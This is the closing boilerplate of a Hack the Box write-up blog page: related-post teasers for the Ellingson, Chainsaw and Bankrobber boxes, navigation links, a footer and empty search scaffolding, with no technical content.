  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->






  <div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/hack-the-box/2019/10/19/htb-machine-ellingson/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Oct 19, 2019
  

  <i class="unloaded">2019-10-19T12:00:00-04:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Ellingson</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Ellingson was a very interesting box personally. Marked as hard by Hackthebox it involved web enumeration and python console abuse for initial foothold, finding sensitive backup fi...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/hack-the-box/2019/11/23/htb-machine-chainsaw/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Nov 23, 2019
  

  <i class="unloaded">2019-11-23T11:00:00-05:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Chainsaw</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Chainsaw was an interesting box that I thoroughly enjoyed. Upon first investigation an anonymous ftp connection allowed access to some intersting files. Further investigation led t...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/hack-the-box/2020/03/07/htb-machine-bankrobber/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Mar  7, 2020
  

  <i class="unloaded">2020-03-07T11:00:00-05:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Bankrobber</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Starting with a client side XSS exploit to get admin app credentials, then chaining it with a localhost code execution bypass we get a user priviledged shell. A suspicious app runn...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->



    <!--
  Navigation buttons at the bottom of the post.

  v2.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/hack-the-box/2019/10/19/htb-machine-ellingson/" class="btn btn-outline-primary">
    <p>Hack the Box - Ellingson</p>
  </a>
  

  
  <a href="/hack-the-box/2019/11/02/htb-machine-haystack/" class="btn btn-outline-primary">
    <p>Hack the Box - Haystack</p>
  </a>
  

</div>

    

    </div> <!-- #post-extend-wrapper -->

  </div> <!-- .col-* -->

</div> <!-- .row -->

<!-- image lazy load: https://github.com/ApoorvSaxena/lozad.js -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>

<script type="text/javascript">
  const imgs = document.querySelectorAll('#post-wrapper img');
  const observer = lozad(imgs);
  observer.observe();
</script>



        <!--
  The Footer
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center">
    <div class="footer-left">
      <p class="mb-0">
        © 2022
        <a href="https://www.linkedin.com/in/downingpatrick">Patrick Downing</a>.
        
        <span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
        
        <a href="/tabs/disclaimer"> Privacy Policy</a>
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        Powered by
        <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
        with
        <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a>
        theme.
      </p>
    </div>
    <script src="//code.jquery.com/jquery-1.11.0.min.js"></script>
    <script type="text/javascript" src="/assets/js/lightbox.js"></script>
    <link rel="stylesheet" href="/assets/css/lightbox.css">
  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

    </div> <!-- #main-wrapper -->

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>
  </body>
</html>
